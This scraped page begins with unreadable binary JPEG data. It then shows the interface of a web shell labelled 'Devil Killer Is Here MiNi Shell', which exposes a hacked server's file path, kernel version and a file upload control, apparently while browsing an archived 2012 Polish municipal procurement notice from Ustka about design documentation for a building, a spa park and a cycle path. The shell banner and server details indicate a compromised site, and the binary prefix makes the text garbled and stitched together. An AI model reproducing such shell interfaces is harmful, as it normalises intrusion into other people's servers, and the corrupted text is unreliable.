JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121019/223405-N-2012.html

<p class="kh_header"><b>Ustka: Opracowanie dokumentacji budowlanych w zakresie: przebudowy budynku, zagospodarowania terenu parku, budowy ciągu pieszo rowerowego na rzecz Gminy Miasta Ustka</b><br>
<b>Numer ogłoszenia: 223405 - 2012; data zamieszczenia: 19.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Ustka , ul. ks. kard. Stefana Wyszyńskiego 3, 76-270 Ustka, woj. pomorskie, tel. 059 8154300, faks 059 8152900.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ustka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji budowlanych w zakresie: przebudowy budynku, zagospodarowania terenu parku, budowy ciągu pieszo rowerowego na rzecz Gminy Miasta Ustka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie dokumentacji budowlanych w zakresie przebudowy budynku, zagospodarowania terenu parku, budowy ciągu pieszo rowerowego na rzecz Gminy Miasta Ustka.
2.	Przedmiot zamówienia został podzielony na następujące zadania:
1)	zadanie  nr 1  -  opracowanie dokumentacji budowlanej dla zadania pn.: Adaptacja pomieszczeń w poziomie  parteru w budynku przy ul. Marynarki Polskiej 12a  oraz rozbudowa budynku wraz z niezbędną infrastrukturą techniczną, celem utworzenia Centrum Turystyki Morskiej w Ustce;
2)	zadanie nr 2 - opracowanie dokumentacji budowlanej dla zadania pn.: Zagospodarowanie terenu parku w ramach rewitalizacji obszaru przy Promenadzie Nadmorskiej i Trakcie Solidarności w Ustce z przeznaczeniem na Park Uzdrowiskowy;
3)	zadanie nr 3  -  opracowanie dokumentacji budowlanej dla zadania pn.: Budowa ciągu pieszo - rowerowego na terenie lasu - od ul. Kościelniaka do drogi brukowej wzdłuż plaży zachodniej w Ustce.
3. Realizacja przedmiotu zamówienia dla każdego zadania polega na wykonaniu niżej wymienionych opracowań i usług:
1)	wykonaniu dokumentacji geotechnicznej warunków posadowienia obiektów budowlanych,
2)	opracowaniu dokumentacji budowlanej, składającej się z:
a) 	projektów budowlanych i wykonawczych,
b) przedmiarów robót 
c) kosztorysów inwestorskich,
d) specyfikacji technicznych wykonania i odbioru robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.20.00-6, 71.24.50.00-7, 71.23.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie usługi polegające na opracowaniu, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.), dokumentacji projektowej (w rozumieniu określonym ustawą Prawo budowlane):
1)	dla zadania nr 1: budowy lub przebudowy obiektu użyteczności publicznej bądź obiektu mieszkalnego, o kubaturze min. 500 m3 każdy;
2)	dla zadania nr 2: zagospodarowania terenów z elementami małej architektury i urządzeniami zabawowymi dla dzieci; 
3)	dla zadania nr 3: budowy lub przebudowy dróg, chodników, ścieżki rowerowej lub ciągu pieszo-rowerowego, o łącznej długości co najmniej 500 m każda dokumentacja.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że zapewni przy realizacji przedmiotu zamówienia udział następujących osób:
1)	dla zadania nr 1: 
a)	osoby posiadającej uprawnienia projektanta w specjalności architektonicznej, legitymującej się doświadczeniem w zaprojektowaniu budowy lub przebudowy co najmniej dwóch obiektów użyteczności publicznej lub obiektów mieszkalnych o kubaturze min 500 m3 każdy, w tym przynajmniej jednego obiektu wymagającego uzgodnienia z konserwatorem zabytków;
b)	osoby posiadającej uprawnienia budowlane projektanta w specjalności konstrukcyjno-budowlanej, legitymującej się minimum 2-letnim doświadczeniem w projektowaniu;
c)	osoby posiadającej uprawnienia budowlane projektanta w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, legitymującej się minimum 2-letnim doświadczeniem zawodowym w projektowaniu; 
d)	osoby posiadającej uprawnienia projektanta w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, legitymującej się minimum 2-letnim doświadczeniem zawodowym w projektowaniu; 
2)	dla zadania nr 2 i nr 3:
a)	osoby posiadającej uprawnienia projektanta w specjalności architektonicznej, legitymującego się minimum 3-letnim doświadczeniem zawodowym w projektowaniu; 
b)	osoby posiadającej uprawnienia projektanta w specjalności konstrukcyjno-budowlanej lub specjalności drogowej, legitymującej się minimum 2-letnim doświadczeniem zawodowym w projektowaniu;
c)	osoby posiadającej uprawnienia projektanta w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, legitymującego się minimum 2-letnim doświadczeniem zawodowym w projektowaniu;
(Zamawiający akceptuje uprawnienia budowlane odpowiadające uprawnieniom  wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej wydanych przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty przygotowany zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ;
2)	w przypadku działania Wykonawcy przez pełnomocnika, należy dołączyć do oferty pełnomocnictwo w oryginale lub jego kopię poświadczoną notarialnie;
3)	pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o realizację zamówienia, zgodnie z pkt. 10 SIWZ;
4)	jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w następującym zakresie:
1)	terminu realizacji umowy na skutek:
a)	przedłużających się procedur związanych z wykorzystaniem przez Wykonawców środków ochrony prawnej w zamówieniach publicznych lub innych procedur zamówień publicznych,
b)	poczynienia ustaleń w trakcie narad Wykonawcy z Zamawiającym, zmierzających ku maksymalnemu zabezpieczeniu wymagań Zamawiających w zakresie przedmiotowej inwestycji, wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy;
2)	osoby pełniącej funkcję projektanta, przy czym nowo wskazana osobo powinna spełniać wymagania określone przez Zamawiającego w pkt. 8.1.3. SIWZ i uzyskać akceptację Zamawiającego.
2.	W żadnym wypadku postanowień punktu powyższego nie należy interpretować jako udzielenie dowolnej ze stron roszczenia do żądania zmiany umowy, a jedynie możliwość dokonania zmiany umowy.
3.	Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz wymaga zgody drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ustka pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ustka, 76-270 Ustka, ul. Ks. Kard. S. Wyszyńskieggo 3, pokój nr 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 10:00, miejsce: Urząd Miasta Ustka, 76-270 Ustka, ul. Ks. Kard. S. Wyszyńskieggo 3, Biuro Obsugi Interesantów (pokój nr 104).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Źródła finansowania przedmiotu zamówienia:
zadanie nr 1 - 	ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Współpracy Transgranicznej Południowy Bałtyk 2007-2013 oraz ze środków własnych gminy;
zadanie nr 2 - 	w ramach Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych  obszarów rybackich 2007-2013, tj. dotacja w ramach PO-RYBY - 85% w tym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rybackiego - 75% i budżetu Państwa - 15% oraz środków własnych gminy;
zadanie nr 3 - 	ze środków własnych gminy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> opracowanie dokumentacji budowlanej dla zadania pn.: Adaptacja pomieszczeń w poziomie  parteru w budynku przy ul. Marynarki Polskiej 12a  oraz rozbudowa budynku wraz z niezbędną infrastrukturą techniczną, celem utworzenia Centrum Turystyki Morskiej w Ustce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zadania jest opracowanie dokumentacji budowlanej dla zadania pn.: Adaptacja pomieszczeń w poziomie  parteru w budynku przy ul. Marynarki Polskiej 12a  oraz rozbudowa budynku wraz z niezbędną infrastrukturą techniczną, celem utworzenia Centrum Turystyki Morskiej w Ustce.
2. Budynek  przeznaczony do adaptacji wykazany jest w Gminnym programie opieki nad zabytkami dla miasta Ustka na lata 2012-2015, przyjętym uchwałą Rady Miasta Ustka Nr XXV/215/2012 z dnia 26.07.2012r. pod pozycją inne zabytki nieruchome znajdujące się w wojewódzkiej ewidencji zabytków.
3. Inwestycja zlokalizowana jest na terenie objętym Miejscowym Planem Zagospodarowania Przestrzennego: Centrum 2, zatwierdzonym uchwałą Nr XII/103/2003 Rady Miejskiej w Ustce z dnia 25.09.2003 r., na obszarze jednostki urbanistycznej o symbolu 5U - położona na działce nr 1561; lokalizacja inwestycji określona jest na mapie stanowiącej załącznik nr 7/1 do SIWZ.	
4. Realizacja  zadania polega na wykonaniu niżej wymienionych opracowań i usług:
1)	wykonaniu dokumentacji geotechnicznej warunków posadowienia obiektów budowlanych,
2)	opracowaniu dokumentacji budowlanej, składającej się z:
a) projektów budowlanych i wykonawczych:
--- zagospodarowania terenu: zbiorczy plan uzbrojenia terenu, odwodnienia, oświetlenia, miejsc postojowych, zieleni;
--- branży architektonicznej: rzuty poziome, przekroje pionowe, rysunki elewacji, wykazy: stolarki i ślusarki, aranżacja wnętrz, projekty detali architektonicznych;
--- branży konstrukcyjno-budowlanej: projekty konstrukcyjne fundamentów, projekty konstrukcji podstawowej oraz innych elementów nośnych i przekryć, projekty samodzielnych elementów konstrukcyjnych;
--- instalacji wewnętrznych wraz z niezbędnymi przyłączami, wyposażeniem i osprzętem: wodno-kanalizacyjnej; cwu i co (ogrzewanie gazowe); wentylacji nawiewno - wywiewnej i klimatyzacji; elektrycznej oświetlenia ogólnego i gniazd wtykowych; alarmowej; odgromowej; audio-wizualnej, komputerowej, oświetlenia iluminacyjnego;
--- charakterystyka energetyczna budynku;
--- w obiekcie należy przewidzieć następujące funkcje: sprzedaż biletów na rejsy promem pasażerskim, poczekalnia, przechowalnia bagażu, sanitariaty, informacja turystyczna            z sektorem sprzedaży pamiątek, powierzchnia biurowa z punktem poboru opłat portowych, ewentualnie: kawiarnia/restauracja;
--- rozbudowa ma nie nawiązywać do istniejącego obiektu, ma jednak stanowić z nim harmonijną całość, uwzględnić dużą ilość przeszkleń w bryle;
--- z uwagi na zabytkowy charakter obiektu Wykonawca jest zobowiązany do uzyskania warunków rozbudowy od konserwatora zabytków; 
--- pod planowaną rozbudowę przewidzieć powierzchnię ok. 100 m2, ilość kondygnacji: 1,5,  powierzchnia do adaptacji pomieszczeń w poziomie parteru  istniejącego budynku;
b) przedmiarów robót;
c) kosztorysów inwestoriskich;
d) specyfikacji technicznych wykonania i odbioru robót.
5. Wykonawca we własnym zakresie i na własny koszt:
1)	pozyska mapę do celów projektowych,
2)	zabezpieczy obsługę geodezyjną, geologiczną i geotechniczną,
3)	wykona wszystkie pomiary, badania, obliczenia i ekspertyzy potrzebne do prawidłowego opracowania dokumentacji technicznej,
4)	uzyska wszystkie warunki, opinie, decyzje i uzgodnienia niezbędne (bez ZUD) do prawidłowego wykonania opracowań oraz wymagane do uzyskania decyzji administracyjnej będącej pozwoleniem na budowę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.20.00-6, 71.24.50.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji budowlanej dla zadania pn.: Zagospodarowanie terenu parku w ramach rewitalizacji obszaru przy Promenadzie Nadmorskiej i Trakcie Solidarności w Ustce z przeznaczeniem na Park Uzdrowiskowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zadania jest opracowanie dokumentacji budowlanej dla zadania pn.: Zagospodarowanie terenu parku w ramach rewitalizacji obszaru przy Promenadzie Nadmorskiej i Trakcie Solidarności w Ustce z przeznaczeniem na Park Uzdrowiskowy.
2. Inwestycja zlokalizowana jest na terenie objętym Miejscowym Planem                Zagospodarowania Przestrzennego: Promenada, zatwierdzonym uchwałą nr VI/30/2001 Rady Miejskiej w Ustce z dnia 28.06.2001r., na obszarze jednostek urbanistycznych o symbolach: 1ZL1 - położona na działce nr 123 i  5ZP/UZ3, 7ZP/UZ2, 5ZP/UZ4, 8ZP/UZ1, 8ZP/UZ2, 5ZP/UZ5, 7ZP/UZ3, 7ZP/UZ4, 11ZP/UZ6, 11ZP/UZ5, 11ZP/UZ4, 11ZP/UZ8, 1ZL1 - położonych  na działce nr 1025/2; lokalizacja inwestycji określona jest na mapie stanowiącej załącznik nr 7/2 do SIWZ.
3. Realizacja  zadania polega na wykonaniu niżej wymienionych opracowań i usług:
1)	wykonaniu dokumentacji geotechnicznej warunków posadowienia obiektów budowlanych,
2)	opracowaniu dokumentacji budowlanej, składającej się z:
a) projektów budowlanych i wykonawczych:
--- zagospodarowania terenu: zbiorczy plan uzbrojenia terenu, oświetlenia, zieleni, ciągów pieszych, placów rekreacyjnych, placów zabaw, ścieżki zdrowia, elementów małej architektury;
--- architektury: rozwiązania architektoniczne zagospodarowania terenu z uwzględnieniem: ciągu pieszego i szerokości 2 m o nawierzchni utwardzonej z kostki betonowej o długości ok. 17 m; ciąg pieszy nieutwardzony (geokrata wypełniona kruszywem) o długości ok. 0,6 km i szer. 1,5 m,  utwardzone place pod zabudowę architekturą parkową i usługową związaną z wypoczynkiem nadmorskim -  4 szt. o nawierzchni z kostki granitowej i płyt o nawierzchni strukturalnej, o łącznej powierzchni ok. 2000 m2, elementy małej architektury: altana drewniana, place zabaw, drogowskazy, tablice informacyjne, słupki uliczne, ławki wokół drzew, stalowe kraty ochronne wokół drzew, elementy ścieżki zdrowia, ławki parkowe, kosze, stoły do gry w szachy;   
--- branży konstrukcyjno-budowlanej - projekty konstrukcyjne nawierzchni, altany i innych elementów wymagających konstrukcji podstawowych;
